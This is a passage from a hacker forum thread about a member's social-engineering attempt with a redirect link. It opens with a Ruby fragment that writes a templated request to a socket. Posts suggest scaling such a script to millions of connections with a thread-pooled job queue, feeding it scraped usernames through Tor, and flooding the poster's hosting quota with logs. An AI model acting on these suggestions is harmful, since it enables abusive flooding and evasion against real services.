  socket.write template.gsub(/###/,
(opts.map{|k,v| "#{k}=#{v}"}.join '&')
)

So I am. Got a little copy and paste happy. I fixed it but it still doesn't work anyway :P

Oh well, the threaded version is nice and fast. With a little work and the producer/consumer model you can make a nice job queue to limit the number of threads and simultaneous connections, just in case you wanted to run this a few million times. If you want to be really clever, crawl the binrev site and get a list of usernames instead of random words and run it through Tor or something ;)

I find it funny that the original poster was trying to social engineer the members of the forum. He didn't make a good attempt, relying on random people to click a redirection URL. When I first saw the link, I knew it could have been malicious. Again, he made a very poor attempt at social engineering.

Yet it generated some interesting discussion. I almost wish this happened more often.


Perhaps it was just a clever attempt to social engineer you all into telling them a better way and pointing out all the flaws/problems haha

Edited by TelcoBob
I find it funny that the original poster was trying to social engineer the members of the forum. He didn't make a good attempt, relying on random people to click a redirection URL.

Heh. Makes me laugh, especially since everyone came up with better ways to do it.

Reminds me of this clip, from the movie "Gone in 60 Seconds":

"You need a role model!" :)


I did a little research on that hosting site and they don't give you /too much/ space for free. makes me wonder if we could fill up his entire directory with like 50 mb of text logs so he can't do this stuff anymore.. :P

